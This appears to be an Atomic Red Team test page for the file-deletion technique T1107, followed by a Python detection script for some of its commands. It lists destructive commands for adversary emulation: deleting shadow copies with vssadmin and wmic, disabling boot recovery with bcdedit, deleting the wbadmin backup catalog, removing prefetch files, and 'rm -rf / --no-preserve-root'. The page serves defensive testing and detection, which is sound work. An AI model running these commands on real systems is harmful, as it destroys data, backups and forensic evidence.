
# T1107 - File Deletion

Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native cmd functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

## Atomic Tests


## Atomic Test #1 - Delete a single file - Linux/macOS

Delete a single file from the temporary directory

**Supported Platforms:** Linux, macOS

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_delete | Path of file to delete | Path | /tmp/victim-files/a |

#### Attack Commands: Run with `sh`!

```sh
rm -f #{file_to_delete}
```


## Atomic Test #2 - Delete an entire folder - Linux/macOS

Recursively delete the temporary directory and all files contained within it

**Supported Platforms:** Linux, macOS

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | /tmp/victim-files |

#### Attack Commands: Run with `sh`!

```sh
rm -rf #{folder_to_delete}
```


## Atomic Test #3 - Overwrite and delete a file with shred

Use the shred command to overwrite the temporary file and then delete it

**Supported Platforms:** Linux

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_shred | Path of file to shred | Path | /tmp/victim-shred.txt |

#### Attack Commands: Run with `sh`!

```sh
shred -u #{file_to_shred}
```


## Atomic Test #4 - Delete a single file - Windows cmd

Delete a single file from the temporary directory using cmd.exe

**Supported Platforms:** Windows

#### Attack Commands: Run with `command_prompt`!

```cmd
echo "T1107" > %temp%\T1107.txt
del /f  %temp%\T1107.txt
```


## Atomic Test #5 - Delete an entire folder - Windows cmd

Recursively delete the temporary directory and all files contained within it using cmd.exe

**Supported Platforms:** Windows

#### Attack Commands: Run with `command_prompt`!

```cmd
mkdir %temp%\T1107
rmdir /s /q %temp%\T1107
```


## Atomic Test #6 - Delete a single file - Windows PowerShell

Delete a single file from the temporary directory using PowerShell

**Supported Platforms:** Windows

#### Attack Commands: Run with `powershell`!

```powershell
New-Item $env:TEMP\T1107.txt
Remove-Item -path $env:TEMP\T1107.txt
```


## Atomic Test #7 - Delete an entire folder - Windows PowerShell

Recursively delete the temporary directory and all files contained within it using PowerShell

**Supported Platforms:** Windows

#### Inputs:

| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| folder_to_delete | Path of folder to delete | Path | C:\Windows\Temp\victim-files-ps |

#### Attack Commands: Run with `powershell`!

```powershell
New-Item $env:TEMP\T1107 -ItemType Directory
Remove-Item -path $env:TEMP\T1107 -recurse
```


## Atomic Test #8 - Delete VSS - vssadmin

Delete all volume shadow copies with vssadmin.exe

**Supported Platforms:** Windows

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
vssadmin.exe Delete Shadows /All /Quiet
```


## Atomic Test #9 - Delete VSS - wmic

Delete all volume shadow copies with wmic

**Supported Platforms:** Windows

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
wmic shadowcopy delete
```


## Atomic Test #10 - bcdedit

This test leverages bcdedit to remove boot-time recovery measures.

**Supported Platforms:** Windows

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
```


## Atomic Test #11 - wbadmin

This test deletes Windows Backup catalogs.

**Supported Platforms:** Windows

#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)

```cmd
wbadmin delete catalog -quiet
```


## Atomic Test #12 - Delete Filesystem - Linux

This test deletes the entire root filesystem of a Linux system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive; do NOT use it on production equipment.

**Supported Platforms:** Linux

#### Attack Commands: Run with `bash`!

```bash
rm -rf / --no-preserve-root > /dev/null 2> /dev/null
```


## Atomic Test #13 - Delete-PrefetchFile

Delete a single prefetch file. Deletion of prefetch files is a known anti-forensic technique.

**Supported Platforms:** Windows

#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)

```powershell
Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" -Name)[0])
```
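A defender-side counterpart to Tests #8 through #11 and #13, added here as an example and not part of the Atomic Red Team repository: it runs process-creation detection rules for the shadow-copy, bcdedit, wbadmin and prefetch commands above over constructed JSON-lines events and raises a second alert when one host trips several of them. The event field names (`host`, `user`, `cmdline`) and the sample events are assumptions.

```python
import json
import re
from collections import defaultdict

# Rules for the recovery-inhibiting and anti-forensic command lines exercised by
# Atomic Tests #8-#11 and #13 above; command lines are lower-cased and
# whitespace-collapsed before matching, so case and spacing variants still hit.
RULES = {
    "vss_delete_vssadmin": re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b"),
    "vss_delete_wmic": re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b"),
    "bcdedit_recovery_off": re.compile(
        r"\bbcdedit(?:\.exe)?\s+/set\b.*(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)"),
    "wbadmin_catalog_delete": re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b"),
    "prefetch_delete": re.compile(r"\b(?:remove-item|del|erase)\b.*\\prefetch\\.*\.pf\b"),
}

def match_rules(cmdline):
    """Return the names of every rule the command line triggers."""
    norm = " ".join(cmdline.lower().split())
    return [name for name, rx in RULES.items() if rx.search(norm)]

def load_events(text):
    """Parse JSON-lines process-creation events (assumed fields: host, user, cmdline)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def scan(events):
    """Return one alert per matching command, plus a 'recovery_inhibition_cluster' alert
    for any host tripping two or more distinct rules (the usual pre-encryption sequence)."""
    alerts, per_host = [], defaultdict(set)
    for ev in events:
        for rule in match_rules(ev["cmdline"]):
            alerts.append({"rule": rule, "host": ev["host"], "user": ev["user"],
                           "cmdline": ev["cmdline"]})
            per_host[ev["host"]].add(rule)
    for host, rules in per_host.items():
        if len(rules) >= 2:
            alerts.append({"rule": "recovery_inhibition_cluster", "host": host,
                           "rules": sorted(rules)})
    return alerts

# Constructed sample events (not real telemetry); the last line is benign and must not alert.
SAMPLE_LOG = r"""
{"host": "ws01", "user": "CORP\\alice", "cmdline": "vssadmin.exe Delete Shadows /All /Quiet"}
{"host": "ws01", "user": "CORP\\alice", "cmdline": "bcdedit /set {default} recoveryenabled no"}
{"host": "ws01", "user": "CORP\\alice", "cmdline": "wbadmin delete catalog -quiet"}
{"host": "srv02", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "WMIC  shadowcopy   DELETE"}
{"host": "ws03", "user": "CORP\\bob", "cmdline": "powershell.exe Remove-Item -Path \"C:\\Windows\\prefetch\\NOTEPAD.EXE-ABC12345.pf\""}
{"host": "ws03", "user": "CORP\\bob", "cmdline": "vssadmin list shadows"}
"""
```

`scan(load_events(SAMPLE_LOG))` yields five per-command alerts and one cluster alert for ws01, where the vssadmin, bcdedit and wbadmin commands appear together; `vssadmin list shadows` stays silent.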